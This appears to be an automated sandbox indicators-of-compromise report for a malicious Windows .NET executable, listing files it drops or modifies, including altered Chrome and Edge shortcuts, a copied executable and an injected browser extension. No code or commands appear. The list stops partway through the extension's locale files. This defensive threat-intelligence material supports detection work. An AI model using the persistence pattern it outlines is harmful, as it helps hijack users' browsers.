IOC Report
zlONcFaXkc.exe

Files

File Path
Type
Category
Malicious
zlONcFaXkc.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x4277bb07, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:16 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 11:10:59 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
modified
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_zcezeaqsuhi.exe_2eccf0ba13a86cf1e1a7577debc3c62bd9f527_7718e8e7_69a45190-049e-4ed2-84e1-5c3b9073c72f\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD304.tmp.dmp
Mini DuMP crash report, 16 streams, Tue Apr 23 21:02:19 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBBB.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC29.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC75.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE4B.tmp.txt
data
dropped
C:\Users\Public\Desktop\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 11:02:30 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zlONcFaXkc.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\18807df7-e6b8-43eb-a965-3fc8fa8dc593.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\433817b6-fd93-48f6-b0dd-fb2ff4429f1e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5652a66e-b171-4090-a3de-71036d446494.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\e252861a-11ce-4449-a12f-2ffb172b2e3e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821CF-1DB0.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821EA-1908.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-662821F2-2614.pma
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\00c90de8-88af-422d-ae02-e6ebd102ce0a.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\097fdca7-1191-436a-b8f7-6bd14d31d610.tmp
ASCII text, with very long lines (1597), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1cd88563-5b52-4123-99dd-2461a7c4ca5e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\21f79397-4ad8-4701-b38d-8ebd37a723ad.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3e9c75e7-e58c-4a78-a43f-0ecb34d11b67.tmp
Unicode text, UTF-8 text, with very long lines (17792), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\416c4337-c1e2-4d88-96a5-4463b1912f7a.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5e6c4d37-7ca2-4531-8ca2-a8563be0b4c8.tmp
Unicode text, UTF-8 text, with very long lines (17901), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\78240d07-9199-428b-9e25-9d13cdda077e.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7d58b8e6-5bc5-429f-98ab-27355ecc933d.tmp
Unicode text, UTF-8 text, with very long lines (17864), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8110ccec-f0a1-4f85-95f8-9cae8e8d2b32.tmp
Unicode text, UTF-8 text, with very long lines (17945), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8b412ceb-47bc-4674-bd80-5df649b7e404.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log
data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)
ASCII text, with very long lines (1597), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\mhpndkmgbeollhlhekioinkiofjhnfki\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4cdaab27-f2c7-44a6-9b91-027c7968e31b.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\746d4978-54f9-44a5-a112-4e76b4fc789b.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9d44da8e-adec-4a59-9791-d41df16adce1.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF2f6ba.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3e1e5.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL
SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2daa6.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2db23.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity~RF2f6ca.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a86dd10d-090e-4b67-a5c0-7d49815b7716.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dd30c035-e8b4-4c33-9398-99cd252e6cba.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e2e0c34c-2646-4aaf-b536-042d4583c7f7.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f777b565-fe97-4037-942a-af264455caf6.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2fdce.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF34065.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF395f8.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c11e.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4aff3.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF30e49.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF33e33.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF33559.TMP (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\448db563-8897-4d43-9bb6-e6e878491b63.tmp
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State~RF3e1e5.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL
SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c773cec8-a390-4ac2-940b-ecfe97e5f06d.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\eb4607d5-61c1-44a5-9ec4-8db77909cc13.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json
ASCII text, with very long lines (3951), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\b34b224d-4463-4d57-9b4a-d53ff3fe8ace.tmp
Unicode text, UTF-8 text, with very long lines (17147), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001
OpenPGP Secret Key
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2aa5f.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b03b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2b05a.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2d75b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF300bc.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3103d.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF310ba.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF33142.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3bc3c.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3e35c.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41f6b.TMP (copy)
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\ChromeExtMalware.store_new
data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_0
FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_1
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\data_3
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache\index
FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSynchronousLookupUris_0
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-0
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_636976985063396749.rel.v2
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371
data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982
raw G3 (Group 3) FAX, byte-padded
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\a684c92d-771d-4399-be58-89944aaec192.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ba00d8e9-3b4a-41f3-bf2c-0126261146b8.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\c2d56a7a-5247-4fa6-b2ff-828228659820.tmp
JSON data
modified
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e03b6c29-4b01-4499-a3d6-4ab1f1ab126d.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\e89d102b-e524-4ecb-98f5-92b221a08681.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\eace5798-c2fd-4316-b66d-a6d393f45355.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\f21f7baa-5f58-4c73-82fe-6f3823c9143a.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\faacf587-6158-4adc-89b1-6f1929d2dfba.tmp
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
data
dropped
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres
data
dropped
C:\Users\user\AppData\Local\Temp\0c49ff99-76fe-4570-a48c-603b5195fb1c.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\Extension\background.js
C source, ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\content.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\js\injected-script.js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\Extension\manifest.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\bffb21de-8a7e-40f0-863b-38890faf5c1e.tmp
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\ca9cbf2c-434f-4137-b1d9-fc2e1b91db60.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\cv_debug.log
JSON data
dropped
C:\Users\user\AppData\Local\Temp\e9cd6829-fbd7-41ae-b906-daeaa5ab9731.tmp
Google Chrome extension, version 3
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\128.png
PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\af\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\am\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ar\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\az\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\be\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\bg\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\bn\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\ca\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\cs\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\cy\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\da\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\de\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\el\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en\messages.json
JSON data
dropped
C:\Users\user\AppData\Local\Temp\scoped_dir8092_1132801430\CRX_INSTALL\_locales\en_CA\messages.json
